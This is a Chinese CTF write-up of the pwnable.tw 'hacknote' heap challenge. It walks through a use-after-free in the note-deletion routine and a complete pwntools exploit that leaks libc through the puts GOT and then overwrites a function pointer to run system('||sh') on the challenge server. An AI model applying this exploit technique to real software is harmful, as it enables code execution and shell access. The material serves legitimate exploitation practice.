【PWN刷题】Pwnable-hacknote

题目来源:https://pwnable.tw/challenge

目录

前言

一、Pwnable-hacknote

1.检查保护

2.IDA分析

3.漏洞利用:

4.EXP

总结


前言

回顾经典老题。


一、Pwnable-hacknote

1.检查保护

32位没开PIE,堆题一般全开。

【PWN刷题】Pwnable-hacknote_第1张图片

2.IDA分析

①太经典辣,堆菜单题。三个功能,add、delete和show。

【PWN刷题】Pwnable-hacknote_第2张图片【PWN刷题】Pwnable-hacknote_第3张图片

 ②看堆题先看delete,果然free后没有置空,存在UAF漏洞。

【PWN刷题】Pwnable-hacknote_第4张图片

③观察add函数,ptr数组每个单元0x8大小,前4用来存note指针,发现了sub_804862B函数puts指针,可以用来泄露libc。

【PWN刷题】Pwnable-hacknote_第5张图片

 

3.漏洞利用:

①add两个fastbin chunk,0x8

②delete上边两个chunk,虽然free了但是没置0

③add一个size为8的chunk2,content为p32(0x0804862b)+函数got地址

④show(0),由于delete没有置空,ptr中还存放着note原来的地址,我们新加入的chunk2覆盖了chunk0的ptr,当show(0)时直接调用了0x0804862b输出了函数libc地址。

⑤操作如上,我们通过偏移找到system地址,调用system执行system(sh)

4.EXP

#!/usr/bin/env python3
# coding = utf-8

from pwn import *
context(arch = "i386", os = "linux", log_level = "debug")

def send_choice(choice):
    p.recvuntil('choice :')
    p.sendline(str(choice))

def add(size,content):
    send_choice(1)
    p.recvuntil('size :')
    p.sendline(str(size))
    p.recvuntil('Content :')
    p.sendline(content)

def delete(index):
    send_choice(2)
    p.recvuntil('Index :')
    p.sendline(str(index))
    
def show(index):
    send_choice(3)
    p.recvuntil('Index :')
    p.sendline(str(index))


#p = process('./hacknote')
p = remote("chall.pwnable.tw",10102)
elf = ELF('./hacknote')
libc=ELF("./libc_32.so.6")
#gdb.attach(p, "")


add(0x20, b'0')#0
add(0x20, b'1')#1
delete(0)
delete(1)
payload = p32(0x0804862b) + p32(elf.got['puts'])#leak libc
add(8, payload)
show(0)
libc_puts = u32(p.recv(4))


libc_base = libc_puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']

delete(2)
payload = p32(system) + b'||sh'
add(0x8, payload)
show(0)

p.interactive()

你可能感兴趣的:(Pwn刷题之路,安全,网络安全)